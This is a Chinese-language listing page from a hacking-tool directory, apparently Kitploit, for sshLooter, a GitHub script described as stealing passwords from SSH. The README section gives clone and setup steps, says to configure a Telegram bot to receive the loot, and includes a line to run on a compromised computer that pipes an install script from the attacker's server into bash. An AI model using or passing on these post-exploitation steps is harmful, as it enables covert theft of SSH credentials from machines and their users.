Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
sshLooter — Script to steal passwords from ssh. | Kitploit
工具/GitHubGitHub/mthbernardes/sshlooter
Password CrackingPersistence MechanismsPost-ExploitationSocial EngineeringRed TeamingArchived
GitHubmthbernardes/sshlooter

sshLooter

Script to steal passwords from ssh.

查看仓库
4891177年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

不要使用这个

有一个更好的C语言版本 sshLooterC

sshLooter

一个用于从SSH窃取密码的脚本。

安装

root@kitploit:~
git clone https://github.com/mthbernardes/sshLooter.git
cd sshLooter

配置

root@kitploit:~
编辑 install.sh 脚本,添加你的 Telegram Bot API 和你的用户ID。
在Telegram中调用 @botfather 创建一个Bot,然后调用 @userinfobot 获取你的用户ID。

使用方法

root@kitploit:~
在你的服务器上执行。
python -m SimpleHTTPServer

在被入侵的电脑上执行。
curl http://yourserverip:8000/install.sh | bash

原始脚本来自

ChokePoint

我关于此脚本的文章

窃取SSH凭证的另一种方法。

下载工具